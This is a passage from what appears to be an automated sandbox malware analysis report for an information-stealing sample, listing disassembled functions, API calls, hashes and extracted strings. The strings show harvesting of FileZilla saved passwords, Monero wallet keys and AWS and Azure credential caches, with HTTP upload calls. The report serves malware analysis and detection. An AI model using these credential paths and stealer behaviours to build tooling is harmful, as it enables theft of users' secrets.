                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 0100068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: a1af0ee0b477343c71193fc3b3dd6a1fc8f4d0a843bbc264881d530d89b6aa1a
                              • Instruction ID: 4ad957c2f5b71fd8cd2e95bedb4a706fa56568a72d823742de67548349ed95e3
                              • Opcode Fuzzy Hash: a1af0ee0b477343c71193fc3b3dd6a1fc8f4d0a843bbc264881d530d89b6aa1a
                              • Instruction Fuzzy Hash: CBD10071A002099BEB15EBF4DD99EEE7778BF68300F544518F182A70C8DF75AA49CB60
                              Function 00FF5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FF4839
                                • Part of subcall function 00FF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FF4849
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FF59F8
                              • StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0198FAC8,00000000,?,0198ED48,00000000,?,01011A1C), ref: 00FF5E71
                              • lstrlen.KERNEL32(00000000), ref: 00FF5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00FF5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FF5E9A
                              • lstrlen.KERNEL32(00000000), ref: 00FF5EAF
                              • lstrlen.KERNEL32(00000000), ref: 00FF5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FF5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00FF5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FF5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FF5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00FF5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00FF5FBD
                              • HttpOpenRequestA.WININET(00000000,0198FA28,?,0198F400,00000000,00000000,00400100,00000000), ref: 00FF5BF8
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • InternetCloseHandle.WININET(00000000), ref: 00FF5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 46895bbed539c78e065566e75f94a74a4f0e3328b3661e6daebcd67f903f43b9
                              • Instruction ID: 92b869e9d82ea06cc1af9ee2b25cf9c01a1ec4eedd05a07d30b37864e87c5bc7
                              • Opcode Fuzzy Hash: 46895bbed539c78e065566e75f94a74a4f0e3328b3661e6daebcd67f903f43b9
                              • Instruction Fuzzy Hash: 8D12C271A20219EBEB16EBA0DC94FEE7378BF24700F5041A9A146A70D0DF746B49CF64
                              Function 00FFCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 01008B60: GetSystemTime.KERNEL32(01010E1A,0198E8C8,010105AE,?,?,00FF13F9,?,0000001A,01010E1A,00000000,?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 01008B86
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FFCF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FFD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FFD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD208
                              • lstrcat.KERNEL32(?,01011478), ref: 00FFD217
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD22A
                              • lstrcat.KERNEL32(?,0101147C), ref: 00FFD239
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD24C
                              • lstrcat.KERNEL32(?,01011480), ref: 00FFD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD26E
                              • lstrcat.KERNEL32(?,01011484), ref: 00FFD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD290
                              • lstrcat.KERNEL32(?,01011488), ref: 00FFD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD2B2
                              • lstrcat.KERNEL32(?,0101148C), ref: 00FFD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD2D4
                              • lstrcat.KERNEL32(?,01011490), ref: 00FFD2E3
                                • Part of subcall function 0100A820: lstrlen.KERNEL32(00FF4F05,?,?,00FF4F05,01010DDE), ref: 0100A82B
                                • Part of subcall function 0100A820: lstrcpy.KERNEL32(01010DDE,00000000), ref: 0100A885
                              • lstrlen.KERNEL32(?), ref: 00FFD32A
                              • lstrlen.KERNEL32(?), ref: 00FFD339
                                • Part of subcall function 0100AA70: StrCmpCA.SHLWAPI(019889D0,00FFA7A7,?,00FFA7A7,019889D0), ref: 0100AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00FFD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 72dfe79bc355a23b3c0716fe251e473fce8a1546dffd47908a9883294e83cb48
                              • Instruction ID: c58c47c8752fffa73e79b2c98eec991a78283446cce3667d9672ed306056bc09
                              • Opcode Fuzzy Hash: 72dfe79bc355a23b3c0716fe251e473fce8a1546dffd47908a9883294e83cb48
                              • Instruction Fuzzy Hash: 37E13471A10209EBDB15EBA0DD99EEE7378BF64200F104168E187A70D4DF35AF49DB61
                              Function 00FFC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0198D8D0,00000000,?,0101144C,00000000,?,?), ref: 00FFCA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FFCA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00FFCA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FFCAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00FFCAD9
                              • StrStrA.SHLWAPI(?,0198D9D8,01010B52), ref: 00FFCAF7
                              • StrStrA.SHLWAPI(00000000,0198D918), ref: 00FFCB1E
                              • StrStrA.SHLWAPI(?,0198E2B0,00000000,?,01011458,00000000,?,00000000,00000000,?,01988990,00000000,?,01011454,00000000,?), ref: 00FFCCA2
                              • StrStrA.SHLWAPI(00000000,0198E110), ref: 00FFCCB9
                                • Part of subcall function 00FFC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FFC871
                                • Part of subcall function 00FFC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FFC87C
                              • StrStrA.SHLWAPI(?,0198E110,00000000,?,0101145C,00000000,?,00000000,019888C0), ref: 00FFCD5A
                              • StrStrA.SHLWAPI(00000000,01988C10), ref: 00FFCD71
                                • Part of subcall function 00FFC820: lstrcat.KERNEL32(?,01010B46), ref: 00FFC943
                                • Part of subcall function 00FFC820: lstrcat.KERNEL32(?,01010B47), ref: 00FFC957
                                • Part of subcall function 00FFC820: lstrcat.KERNEL32(?,01010B4E), ref: 00FFC978
                              • lstrlen.KERNEL32(00000000), ref: 00FFCE44
                              • CloseHandle.KERNEL32(00000000), ref: 00FFCE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 7798a07158b4f54e7115a3ae1663fd9ed1c0fb290952aa6e21f723208502456d
                              • Instruction ID: f8f84c774190d3a48ebe350d4d9e9e42f074e0b5fa5f101b310a06bc2f8e05fe
                              • Opcode Fuzzy Hash: 7798a07158b4f54e7115a3ae1663fd9ed1c0fb290952aa6e21f723208502456d
                              • Instruction Fuzzy Hash: 49E1D171A10209EBEB16EBA4DD94FEEB778AF64300F404169F146A71D4DF346B4ACB60
                              Function 01008320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • RegOpenKeyExA.ADVAPI32(00000000,0198BF18,00000000,00020019,00000000,010105B6), ref: 010083A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 01008426
                              • wsprintfA.USER32 ref: 01008459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0100847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0100848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 01008499
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: a9ae3a8adf07347f0c15d3db1889bc0b6b5f72c0b1ec097e402a26a049e3bbb4
                              • Instruction ID: 815282f43472453ffd444c50c1a57fa5f1a177be22cbf322153ca7ac962fa2e8
                              • Opcode Fuzzy Hash: a9ae3a8adf07347f0c15d3db1889bc0b6b5f72c0b1ec097e402a26a049e3bbb4
                              • Instruction Fuzzy Hash: 91811D71910218DBEB65DB54DC94FEAB7B8BF58700F0082D9E18AA7180DF756B85CFA0
                              Function 01004D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01008DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01008E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 01004DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 01004DCD
                                • Part of subcall function 01004910: wsprintfA.USER32 ref: 0100492C
                                • Part of subcall function 01004910: FindFirstFileA.KERNEL32(?,?), ref: 01004943
                              • lstrcat.KERNEL32(?,00000000), ref: 01004E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 01004E59
                                • Part of subcall function 01004910: StrCmpCA.SHLWAPI(?,01010FDC), ref: 01004971
                                • Part of subcall function 01004910: StrCmpCA.SHLWAPI(?,01010FE0), ref: 01004987
                                • Part of subcall function 01004910: FindNextFileA.KERNEL32(000000FF,?), ref: 01004B7D
                                • Part of subcall function 01004910: FindClose.KERNEL32(000000FF), ref: 01004B92
                              • lstrcat.KERNEL32(?,00000000), ref: 01004EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 01004EE5
                                • Part of subcall function 01004910: wsprintfA.USER32 ref: 010049B0
                                • Part of subcall function 01004910: StrCmpCA.SHLWAPI(?,010108D2), ref: 010049C5
                                • Part of subcall function 01004910: wsprintfA.USER32 ref: 010049E2
                                • Part of subcall function 01004910: PathMatchSpecA.SHLWAPI(?,?), ref: 01004A1E
                                • Part of subcall function 01004910: lstrcat.KERNEL32(?,0198FAD8), ref: 01004A4A
                                • Part of subcall function 01004910: lstrcat.KERNEL32(?,01010FF8), ref: 01004A5C
                                • Part of subcall function 01004910: lstrcat.KERNEL32(?,?), ref: 01004A70
                                • Part of subcall function 01004910: lstrcat.KERNEL32(?,01010FFC), ref: 01004A82
                                • Part of subcall function 01004910: lstrcat.KERNEL32(?,?), ref: 01004A96
                                • Part of subcall function 01004910: CopyFileA.KERNEL32(?,?,00000001), ref: 01004AAC
                                • Part of subcall function 01004910: DeleteFileA.KERNEL32(?), ref: 01004B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 4d5638f63ab47e2c6ec9469b03db9526254a8cf81cbd585ce7d9f8619a536af5
                              • Instruction ID: ebed4795c81b3d32d9eb2c536b3c72fd5066f39e8d56970852b4513355bdde80
                              • Opcode Fuzzy Hash: 4d5638f63ab47e2c6ec9469b03db9526254a8cf81cbd585ce7d9f8619a536af5
                              • Instruction Fuzzy Hash: 8F41B97AE4020867D765F770EC46FED3338AB24700F40459872C5A60C5EEF597C88B91
                              Function 01009010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0100906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 415050b95572761e585911cad13b38873a665f22e12842d6d37f4168eb8c7cc1
                              • Instruction ID: 4af547a6366b76bba1c82add09a2cd7ffeda826f49bb353a23aca4416b09fbb3
                              • Opcode Fuzzy Hash: 415050b95572761e585911cad13b38873a665f22e12842d6d37f4168eb8c7cc1
                              • Instruction Fuzzy Hash: AD71DC75A10208EBDB14DFE4E889FEEB7B8BF48700F148518F656E7294DB35A905CB60
                              Function 01002E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 010031C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0100335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 010034EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
